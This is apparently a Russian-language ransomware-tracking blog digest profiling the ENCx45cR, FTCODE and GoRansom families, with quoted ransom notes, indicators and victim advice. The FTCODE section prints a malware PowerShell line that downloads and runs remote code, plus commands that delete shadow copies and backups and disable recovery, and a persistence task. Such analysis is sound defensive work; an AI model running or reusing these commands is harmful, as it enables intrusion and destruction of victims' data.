Шифровальщик (вирус-шантажист). Защита от программ-шифровальщиков. Как удалить вирус-шифровальщик?
Шифровальщики — это вредоносные программы, которые шифруют файлы и требуют выкуп за их расшифровку.
Данный сайт — это ДАЙДЖЕСТ и ПЕРВОИСТОЧНИК информации о шифровальщиках и всевозможных вымогателях.
Авторские статьи, инструкции для пострадавших, рекомендации по защите и профилактике угрозы Ransomware.
К зашифрованным файлам вместо расширения добавляется ENCx45cR. Пример зашифрованного файла: ENCx45cRPhoto001.jpg Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. Активность этого крипто-вымогателя пришлась на конец сентября - начало октября 2019 г. Возможно, что он уже был в августе. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру. Текстовая записка с требованием выкупа отсутствует. Текст содержится внутри экрана блокировки.
Содержание записки о выкупе в экране блокировки: READ: IT IS VERY IMPORTANT THAT YOU DO NOT RENAME ANY FILES THAT WERE ENCRYPTED! THIS WILL LEAD TO THAT FILE BEING RE-ENCRYPTED AND THEN WILL BE LOST FOREVER! Your important files on this computer were encrypted using a public RSA-2048 key, generated for this computer (photos, videos, documents, ect... Click the View Secured Files button to view all of your encrypted files). Getting rid of this tool will NOT help. You will need this tool to DECRYPT and get access to your files again. Your private decryption key has been created and stored on a secure and anonymous server. This key will allow you to decrypt all your files. This key is somewhere in the internet, and if payment is not made in the required time, it will be erased off the server permanently, and ALL your files will be permanently lost. To obtain your private key for this computer, you will need to pay 150.00 USD / 150.00 EUR BitCoin. This is equal to 0.2 Bitcoin that must be paid to decrypt and regain access to all your files. ANY attempts to remove, tamper or damage this software WILL lead to immediate termination of the private key and ALL your files will be permanently LOST. Your time remaining is indicated on the left. If you are ready to make the payment, please click the button below. Перевод записки на русский язык: ПРОЧТИТЕ: ОЧЕНЬ ВАЖНО, ЧТОБЫ ВЫ НЕ ПЕРЕИМЕНОВЫВАЛИ ФАЙЛЫ, КОТОРЫЕ БЫЛИ ЗАШИФРОВАНЫ! ЭТО ПРИВЕДЕТ К ТОМУ, ЧТО ЭТОТ ФАЙЛ БУДЕТ ПОВТОРНО ЗАШИФРОВАН, А ЗАТЕМ БУДЕТ ПОТЕРЯН НАВСЕГДА! Ваши важные файлы на этом компьютере были зашифрованы с использованием открытого ключа RSA-2048, созданного для этого компьютера (фото, видео, документы и т.д. Нажмите кнопку View Secured Files, чтобы просмотреть все зашифрованные файлы). Избавление от этого инструмента НЕ поможет. Вам понадобится этот инструмент, чтобы РАСШИФРОВАТЬ и снова получить доступ к вашим файлам. Ваш личный ключ расшифровки был создан и хранится на безопасном и анонимном сервере. Этот ключ позволит вам расшифровать все ваши файлы. Этот ключ находится где-то в Интернете, и если оплата не будет произведена в течение требуемого времени, он будет удален с сервера навсегда, и ВСЕ ваши файлы будут навсегда потеряны. Чтобы получить свой закрытый ключ для этого компьютера, вам нужно будет заплатить 150,00 долларов США / 150,00 евро в биткойнах. Это равно 0,2 биткойнам, которые необходимо заплатить, чтобы расшифровать и восстановить доступ ко всем вашим файлам. ЛЮБЫЕ попытки удалить, подделать или повредить эту программу приведут к немедленному прекращению действия закрытого ключа, и ВСЕ ваши файлы будут утеряны навсегда. Ваше оставшееся время указано слева. Если вы готовы сделать оплату, нажмите кнопку ниже. Скриншоты других окон экрана блокировки.
Технические детали
Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога. Нужно всегда использовать Актуальную антивирусную защиту!!! Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. Список файловых расширений, подвергающихся шифрованию: Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр. Файлы, связанные с этим Ransomware: GL.exe <random>.exe - случайное название вредоносного файла Расположения: \Desktop\ -> \User_folders\ -> \%TEMP%\ -> Записи реестра, связанные с этим Ransomware: См. ниже результаты анализов. Сетевые подключения и связи: Email: BTC: См. ниже в обновлениях другие адреса и контакты. См. ниже результаты анализов. Результаты анализов: Ⓗ Hybrid analysis >> 𝚺 VirusTotal analysis >> 🐞 Intezer analysis >> ᕒ ANY.RUN analysis >> ⴵ VMRay analysis >> Ⓥ VirusBay samples >> ⨇ MalShare samples >> 👽 AlienVault analysis >> 🔃 CAPE Sandbox analysis >> ⟲ JOE Sandbox analysis >> Степень распространённости: низкая. Подробные сведения собираются регулярно. Присылайте образцы.
=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===
=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES === Ещё не было обновлений этого варианта.
=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256 (в режиме CBC) + RSA-1024, а затем требует выкуп в $500 (0.06 BTC), чтобы вернуть файлы. Оригинальное название: в записке не указано. На файле написано: нет данных. Обнаружения: DrWeb -> W97M.Siggen.1152, Trojan.Siggen8.50878 BitDefender -> Undetected, W97M.Downloader.INK, VB:Trojan.VBS.Downloader.AIR ALYac -> Trojan.Ransom.Powershell Avira (no cloud) -> TR/Agent.gillq, TR/Dldr.Script.pskrh Symantec -> W97M.Downloader, Downloader, JS.Downloader Microsoft -> Trojan:Win32/Vigorf.A, TrojanDownloader:O97M/FTCdedoc.A!M
К зашифрованным файлам добавляется расширение: .FTCODE
Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. Активность этого крипто-вымогателя пришлась на конец сентября - начало октября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру. Записка с требованием выкупа называется: READ_ME_NOW.htm
Содержание записки о выкупе: All your files was encrypted! Yes, You can Decrypt Files Encrypted!!! our price 500 USD Your personal ID: b55718ca-d726-475c-8bba-52fdb5f18*** 1. Download Tor browser - https://www.torproject.org/download/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18*** 5. Follow the instructions on this page ***** Warning***** Do not rename files Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them) As evidence, we can for free back one file Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique. Перевод записки на русский язык: Все ваши файлы были зашифрованы! Да, вы можете расшифровать файлы в зашифрованном виде !!! наша цена 500 долларов Ваш персональный ID: b55718ca-d726-475c-8bba-52fdb5f18*** 1. Скачайте Tor браузер - https://www.torproject.org/download/ 2. Установите Tor браузер 3. Откройте Tor браузер 4. Откройте ссылку в Tor браузере: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18*** 5. Следуйте инструкциям на этой странице ***** Предупреждение ***** Не переименовывать файлы Не пытаться создавать резервные копии своих данных с помощью сторонних программ, это может привести к необратимой потере данных (если вы нам не верите и все еще пытаетесь сделать копии всех файлов, чтобы мы могли помочь вам, сторонние программы навредят им) В качестве доказательства мы можем бесплатно вернуть один файл Декодеры других пользователей не подходят для резервного копирования ваших файлов - ключ шифрования создается на вашем компьютере при запуске программы - он уникален. Скриншоты Tor-сайта вымогателей:
По истечении заданного количества дней, если выкуп не выплачивается, то суммавыкупа увеличивается: первые 3 дня - $500 3-5 дней - $2500 5-10 дней - $5000 10-30 дней - $25000
Есть кнопка для удаления приватного ключа.
Технические детали
Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога. Метод распространения с помощью email-спама и вредоносного email-вложения и запуска описан в статье Certego. Вот краткая часть в переводе на русский язык: Адресат получает email со ссылкой на поддельный счет с вложенным документом под названием "Fattura-2019-951692.doc". Для просмотра "защищенного" содержимого требуется включить макросы. После включения макросов запускается следующий процесс Powershell: powershell iex ((New-Object Net.WebClient).DownloadString('xxxp://home.southerntransitions.net/?need=9f5b9ee&vid=dpec2&81038')); В результате чего загружается фрагмент Powershell-кода, который запускается с помощью команды "Invoke-Expression" ("iex"). Обратите внимание, функция "DownloadString" сохраняет результат запроса только в памяти, чтобы избежать обнаружения антивирусами. Новый код Powershell - это FTCODE . При выполнении он выполняет следующий запрос GET: xxxp://home.southerntransitions[.]net/?need=6ff4040&vid=dpec2& Он нужен, что загрузить файл сценария Visual Basic и сохранить его в C:\Users\Public\Libraries\WindowsIndexingService.vbs Этот вариант JasperLoader, простой бэкдор, который может загружать дополнительные необходимые данные. Затем он пытается создать ярлык "WindowsIndexingService.lnk" в папке автозапуска пользователя, который запускает JasperLoader. Для закрепления в системе и запуска после перезагрузки создается запланированная задача "WindowsApplicationService", ссылающаяся на этот ярлык.
Нужно всегда использовать Актуальную антивирусную защиту!!! Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. ➤ Использует WindowsPowerShell и WindowsIndexingService.vbs, в очередной раз подтверждая их вредоносность для ОС Windows. ➤ Используется Gootkit, который способен похищать из браузеров историю посещений, пароли и файлы cookie, может делать снимки экрана и записывать все, что пользователи вводят внутри веб-форм (пароли, данные банковских карт). Кроме этого Gootkit собирает всю возможную информацию о зараженном хосте и подключенном нему оборудовании. ➤Завершает работу, если присутствует файл %PUBLIC%\OracleKit\w00log03.tmp Удаляет теневые копии файлов, отключает функции восстановления и исправления Windows на этапе загрузки командами: schtasks.exe /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 14 /du 23:59 /TR %PUBLIC%\Libraries\WindowsIndexingService.vbs cmd.exe /c bcdedit /set hacebzb bootstatuspolicy ignoreallfailures bcdedit.exe bcdedit /set hacebzb bootstatuspolicy ignoreallfailures cmd.exe /c bcdedit /set hacebzb recoveryenabled no bcdedit.exe bcdedit /set hacebzb recoveryenabled no cmd.exe /c wbadmin delete catalog -quiet wbadmin.exe wbadmin delete catalog -quiet cmd.exe /c wbadmin delete systemstatebackup wbadmin.exe wbadmin delete systemstatebackup cmd.exe /c wbadmin delete backup wbadmin.exe wbadmin delete backup cmd.exe /c vssadmin delete shadows /all /quiet vssadmin.exe vssadmin delete shadows /all /quiet
Расположения: \Desktop\ -> \User_folders\ -> \%TEMP%\ -> Записи реестра, связанные с этим Ransomware: См. ниже результаты анализов. Сетевые подключения и связи: Tor-URL: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/ URL: home.hopedaybook.com connect.theshotboard.org Email: - BTC: 1ENTEb7MbYfuvUYeTX8foCUPqUnQUWGZsN См. ниже в обновлениях другие адреса и контакты. См. ниже результаты анализов. Результаты анализов: Ⓗ Hybrid analysis >> 𝚺 VirusTotal analysis >>VT>> 🐞 Intezer analysis >> ᕒ ANY.RUN analysis >>AR>> ⴵ VMRay analysis >> Ⓥ VirusBay samples >> ⨇ MalShare samples >> 👽 AlienVault analysis >> 🔃 CAPE Sandbox analysis >> ⟲ JOE Sandbox analysis >> Степень распространённости: средняя. Подробные сведения собираются регулярно. Присылайте образцы.
=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===
=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===
Обновление от 1 октября 2019: Пост в Твиттере >> Пост в Твиттере >> Расширение: .FTCODE Записка: READ_ME_NOW.htm Tor-URL: xxxx://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18ede URL: xxxx://home.southerntransitions.net/ xxxx://connect.southerntransitions.com/ Файлы: powershell.exe, Fattura-2019-951692.doc Мьютексы: CLR_PerfMon_WrapMutex, CLR_CASOFF_MUTEX и другие, см. результаты VT. Результаты анализов: VT + HA + AR
Обновление от 9-11 октября 2019: Пост в Твиттере >> Расширение: .<random> Записка: READ_ME_NOW.htm URL: xxxx://archive.org xxxx://agency.heritage-insuranceagency.com Файлы: powershell.exe, WindowsIndexingService.vbs, myvtfile.exe Результаты анализов: VT + AR
Обновление от 15 октября 2019: Пост в Твиттере >> Расширение: .<random> или .<random{6}> Примеры: .509a49, .21f219, 13d419 Записка: READ_ME_NOW.htm URL: xxxx://jes.dhinsuranceservices.com/ URL: xxxx://jes.whisperinghillequestriancenter.com Файл MS Word: Nuovo_documento_52.doc и с другими номерами Результаты анализов: VT + HA + AR/VT / VT+HA+VMR
➤ Содержание записки: All your files was encrypted! Yes, You can Decrypt Files Encrypted!!! Your personal ID: fbe8dd2b-9f8e-4753-b196-76554809b1f7 1. Download Tor browser - https://www.torproject.org/download/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=fbe8dd2b-9f8e-4753-b196-76554809b1f7 5. Follow the instructions on this page ***** Warning***** Do not rename files Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party s oftware harms them) As evidence, we can for free back one file Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.
Обновление от 30 октября 2019: Пост в Твиттере >> Записка: READ_ME_NOW.htm Результаты анализов: VT + AR URL: xxxx://static.nexilia.it xxxx://mobi.confessyoursins.mobi Обновление от 1 ноября 2019: Пост в Твиттере >> Записка: READ_ME_NOW.htm Результаты анализов: VT + AR
Обновление от 7 ноября 2019: Пост в Твиттере >> Записка: READ_ME_NOW.htm URL: xxxp://dbi.shadysidechurch.com/
На скриншотах выделен код инфо-стилера. Обновление от 10 декабря 2019: Пост в Твиттере >> Записка: READ_ME_NOW.htm Файлы: ScanDocumento__11725497dfc376f565dc41df11738bdaff.vbs Результаты анализов: VT + AR
Обновление от 11 декабря 2019: Топик на форуме >> Расширение: .<random> или .<random{6}> Записка: READ_ME_NOW.htm
Обновление от 20 января 2020: FTCode теперь собирает учетные данные из браузеров (Internet Explorer, Mozilla Firefox, Google Chrome) и email-клиентов (Mozilla Thunderbird, Microsoft Outlook). Способы доступа отличаются: а) в случае с Internet Explorer и Microsoft Outlook, FTCode получает прямой доступ к ключам реестра; б) в случае с Mozilla Firefox, Mozilla Thunderbird и Google Chrome FTCode проникает в папки, где эти приложения хранят учетные данные. После сбора информации FTCode отправляет её своим операторам, используя запрос POST, отправленный на его командно-контрольный сервер (C&C), а имена пользователей и пароли будут закодированы с использованием схемы кодирования Base64. Подробнее в статье на сайте BleepingComputer >>
=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
Read to links:
Tweet on Twitter + Tweet + Tweet + myTweet
ID Ransomware (ID as FTCode)
Write-up, Topic of Support
Earlier tweets I did not know about: Tw, Tw
Thanks:
GrujaRS, Michael Gillespie, Marco Bompani, Matteo Lodi
Andrew Ivanov (author)
Wojciech S., TG Soft, Certego, Lawrence Abrams
to the victims who sent the samples
К зашифрованным файлам добавляется расширение: .gore
Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. Активность этого крипто-вымогателя пришлась на вторую половину сентября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру. Записка без требований выкупа называется: GoRansom.txt
Содержание записки о выкупе: Files have been encrypted by The GoRansom POC Ransomware Decryption Key is hardcoded in the binary. Uses XOR encryption with an 8bit (byte) key. Only 255 possible keys. Run the ransomware in the command line with one argument, decrypt. Example: GoRansom.exe decrypt Перевод записки на русский язык: Файлы были зашифрованы с помощью GoRansom POC Ransomware Ключ расшифровки жестко закодирован в двоичном файле. Использует шифрование XOR с 8-битным (байтовым) ключом. Всего 255 возможных ключей. Запустите Ransomware в командной строке с одним аргументом, расшифровать. Пример: GoRansom.exe decrypt
Технические детали
Согласно Intezer-анализу может быть связан с утекшими в Сеть инструментами кибергруппы APT34 (они же Oilrig и HelixKitten), которым могли воспользоваться другие киберпреступники. Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога. Нужно всегда использовать Актуальную антивирусную защиту!!! Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. Список файловых расширений, подвергающихся шифрованию: Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр. Файлы, связанные с этим Ransomware: GoRansom.txt windows_x86.exe GoRansom.exe <random>.exe - случайное название вредоносного файла Расположения: \Desktop\ -> \User_folders\ -> \%TEMP%\ -> Записи реестра, связанные с этим Ransomware: См. ниже результаты анализов. Сетевые подключения и связи: Email: - BTC: - См. ниже в обновлениях другие адреса и контакты. См. ниже результаты анализов. Результаты анализов: Ⓗ Hybrid analysis >> 𝚺 VirusTotal analysis >>VT>>VT>> 🐞 Intezer analysis >> ᕒ ANY.RUN analysis >>AR>>AR>> ⴵ VMRay analysis >> Ⓥ VirusBay samples >> ⨇ MalShare samples >> 👽 AlienVault analysis >> 🔃 CAPE Sandbox analysis >> ⟲ JOE Sandbox analysis >> Степень распространённости: низкая. Подробные сведения собираются регулярно. Присылайте образцы.
=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===
=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES === Ещё не было обновлений этого варианта.
=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
Запустите GoRansom.exe в командной строке с аргументом decrypt
Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 
Внимание! Файлы можно расшифровать. Загрузите Emsisoft Decryptor для Galacti-Crypter Ransomware >>
Read to links: Tweet on Twitter + Tweet + myTweet ID Ransomware (ID as Galacti-Crypter) Write-up, Topic of Support *
Thanks: Michael Gillespie, MalwareHunterTeam Andrew Ivanov (author) Emsisoft to the victims who sent the samples
